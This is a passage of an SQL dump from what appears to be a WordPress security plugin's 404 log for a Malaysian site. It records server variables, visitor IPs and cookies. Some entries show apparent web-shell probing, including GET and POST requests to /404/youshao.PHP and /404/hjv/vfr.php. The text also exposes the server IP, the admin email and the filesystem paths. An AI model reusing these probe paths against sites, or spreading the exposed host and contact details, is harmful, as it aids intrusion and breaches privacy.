components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaY1r3TLTfzmaEv6rGKjuAAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571173807.4918\";s:12:\"REQUEST_TIME\";s:10:\"1571173807\";}}','notice','2019-10-15 21:10:10','2019-10-15 21:10:07',35680032,37475416,'https://bintara.com.my/v1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'188.213.175.168'),(28083,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:72:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/404/hjv/vfr.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=169df6919c4c6b5f97daf559ab905875\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:38:\"http://bintara.com.my//404/hjv/vfr.php\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/404/hjv/vfr.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/404/hjv/vfr.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaY4CHTLTfzmaEv6rGKlMgAAAMs\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/404/hjv/vfr.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/404/hjv/vfr.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaY4CHTLTfzmaEv6rGKlMgAAAMs\";s:38:\"REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:47:\"REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/404/hjv/vfr.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/404/hjv/vfr.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaY4CHTLTfzmaEv6rGKlMgAAAMs\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/404/hjv/vfr.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/404/hjv/vfr.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaY4CHTLTfzmaEv6rGKlMgAAAMs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"125.120.206.70\";s:11:\"REMOTE_PORT\";s:5:\"58811\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/404/hjv/vfr.php\";s:10:\"SCRIPT_URL\";s:16:\"/404/hjv/vfr.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaY4CHTLTfzmaEv6rGKlMgAAAMs\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571174408.6157\";s:12:\"REQUEST_TIME\";s:10:\"1571174408\";}}','notice','2019-10-15 21:20:10','2019-10-15 21:20:08',35055136,36865064,'https://bintara.com.my/404/hjv/vfr.php',1,0,'125.120.206.70'),(28084,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/404/youshao.PHP\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c98d8ccbde9c052ab26137c118db0a14\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:38:\"http://bintara.com.my//404/youshao.PHP\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/404/youshao.PHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/404/youshao.PHP\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaY4EXTLTfzmaEv6rGKlOAAAAMw\";s:12:\"REDIRECT_URL\";s:16:\"/404/youshao.PHP\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"125.120.206.70\";s:11:\"REMOTE_PORT\";s:5:\"59207\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/404/youshao.PHP\";s:10:\"SCRIPT_URL\";s:16:\"/404/youshao.PHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaY4EXTLTfzmaEv6rGKlOAAAAMw\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571174417.4414\";s:12:\"REQUEST_TIME\";s:10:\"1571174417\";}}','notice','2019-10-15 21:20:19','2019-10-15 21:20:17',35026304,36829152,'https://bintara.com.my/404/youshao.PHP',1,0,'125.120.206.70'),(28085,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/404/youshao.PHP\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=7193a5040f89fe2db842e5f25fba8f35\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:38:\"http://bintara.com.my//404/youshao.PHP\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/404/youshao.PHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/404/youshao.PHP\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaY4GnTLTfzmaEv6rGKlQAAAANU\";s:12:\"REDIRECT_URL\";s:16:\"/404/youshao.PHP\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"125.120.206.70\";s:11:\"REMOTE_PORT\";s:5:\"59595\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/404/youshao.PHP\";s:10:\"SCRIPT_URL\";s:16:\"/404/youshao.PHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaY4GnTLTfzmaEv6rGKlQAAAANU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571174426.4317\";s:12:\"REQUEST_TIME\";s:10:\"1571174426\";}}','notice','2019-10-15 21:20:28','2019-10-15 21:20:26',35026304,36829152,'https://bintara.com.my/404/youshao.PHP',1,0,'125.120.206.70'),(28086,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//404/youshao.PHP\";s:14:\"CONTENT_LENGTH\";s:3:\"349\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:38:\"http://bintara.com.my//404/youshao.PHP\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/404/youshao.PHP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/404/youshao.PHP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaY4HaJ3enRcCPZdox7sgAAAAdQ\";s:12:\"REDIRECT_URL\";s:16:\"/404/youshao.PHP\";s:11:\"REMOTE_ADDR\";s:14:\"125.120.206.70\";s:11:\"REMOTE_PORT\";s:5:\"59736\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/404/youshao.PHP\";s:10:\"SCRIPT_URL\";s:16:\"/404/youshao.PHP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaY4HaJ3enRcCPZdox7sgAAAAdQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571174429.6228\";s:12:\"REQUEST_TIME\";s:10:\"1571174429\";}}','notice','2019-10-15 21:20:31','2019-10-15 21:20:30',35411944,37224960,'http://bintara.com.my//404/youshao.PHP',1,0,'125.120.206.70'),(27971,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.7 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.98.141.222\";s:11:\"REMOTE_PORT\";s:5:\"54098\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMWJA7WMZbw-is73DnZiAAAAEc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570969124.0821\";s:12:\"REQUEST_TIME\";s:10:\"1570969124\";}}','notice','2019-10-13 12:18:47','2019-10-13 12:18:44',35462512,37266240,'https://bintara.com.my/?page_id=18',1,0,'46.98.141.222'),(27970,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"55684\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMLY1pVsBpodkjD2RbTqAAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570966371.9729\";s:12:\"REQUEST_TIME\";s:10:\"1570966371\";}}','notice','2019-10-13 11:32:56','2019-10-13 11:32:52',35419264,37223096,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27967,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"51791\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMLEQ7WMZbw-is73DnWDwAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570966293.4409\";s:12:\"REQUEST_TIME\";s:10:\"1570966293\";}}','notice','2019-10-13 11:31:36','2019-10-13 11:31:33',35419904,37226936,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27968,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"52532\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMLJKRqUuFjrwjUTkWBLgAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570966309.1311\";s:12:\"REQUEST_TIME\";s:10:\"1570966309\";}}','notice','2019-10-13 11:31:52','2019-10-13 11:31:50',35026080,36832520,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27969,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570965408.6841449737548828125000\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, 